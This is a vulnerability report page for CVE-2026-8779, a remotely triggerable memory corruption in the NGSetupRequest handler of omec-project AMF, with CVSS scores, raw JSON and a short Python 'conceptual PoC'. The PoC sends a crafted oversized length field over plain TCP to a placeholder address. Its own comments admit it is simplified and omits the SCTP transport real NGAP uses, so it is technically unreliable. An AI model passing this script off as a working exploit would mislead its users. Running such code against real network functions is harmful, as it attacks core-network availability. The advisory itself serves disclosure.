Security Vulnerability Report
CVE-2026-8779 CVSS 4.3 MEDIUM

CVE-2026-8779

Published: 2026-05-18 02:16:37
Last Modified: 2026-05-18 02:16:37

Description

A vulnerability was found in omec-project amf up to 2.1.3-dev. It affects the function NGSetupRequest in the file ngap/handler.go. Manipulating the argument InformationElement can lead to memory corruption. The attack can be launched remotely. The exploit has been publicly disclosed and may be used. Upgrading the affected component to version 2.2.0 is recommended to address this issue. The same pull request fixes multiple security issues.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

omec-project amf <= 2.1.3-dev

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket
import struct

# Conceptual PoC for CVE-2026-8779
# Description: Sends a malformed packet to trigger InformationElement parsing issue in NGSetupRequest.
# Note: This is a simplified demonstration. Real NGAP traffic runs over SCTP.

TARGET_IP = "192.168.1.100"
TARGET_PORT = 38412  # Example AMF port


def create_malformed_packet():
    # Simulating an NGAP PDU with a crafted InformationElement length
    # that triggers the memory corruption in ngap/handler.go

    # Header placeholder (simplified)
    header = b"\x00\x00\x00\x01"

    # Malformed InformationElement length field (e.g., extremely large value)
    # causing buffer overflow or allocation failure
    bad_length = struct.pack('>I', 0xFFFFFFFF)

    # Padding or payload content
    payload = b"\x41" * 50

    return header + bad_length + payload


def send_exploit():
    try:
        print(f"[*] Sending exploit to {TARGET_IP}:{TARGET_PORT}...")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((TARGET_IP, TARGET_PORT))
        packet = create_malformed_packet()
        s.send(packet)
        print("[+] Packet sent. Check target for crash/memory corruption.")
        s.close()
    except Exception as e:
        print(f"[-] Error occurred: {e}")


if __name__ == "__main__":
    send_exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8779", "sourceIdentifier": "[email protected]", "published": "2026-05-18T02:16:37.180", "lastModified": "2026-05-18T02:16:37.180", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in omec-project amf up to 2.1.3-dev. Impacted is the function NGSetupRequest of the file ngap/handler.go. Executing a manipulation of the argument InformationElement can lead to memory corruption. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version 2.2.0 is recommended to address this issue. The affected component should be upgraded. The same pull request fixes multiple security issues."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}]}], "references": [{"url": "https://github.com/omec-project/amf/", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/issues/671", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/pull/666", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/releases/tag/v2.2.0", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/811616", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/364403", "source": "[email protected]"}, {"url": 
"https://vuldb.com/vuln/364403/cti", "source": "[email protected]"}]}}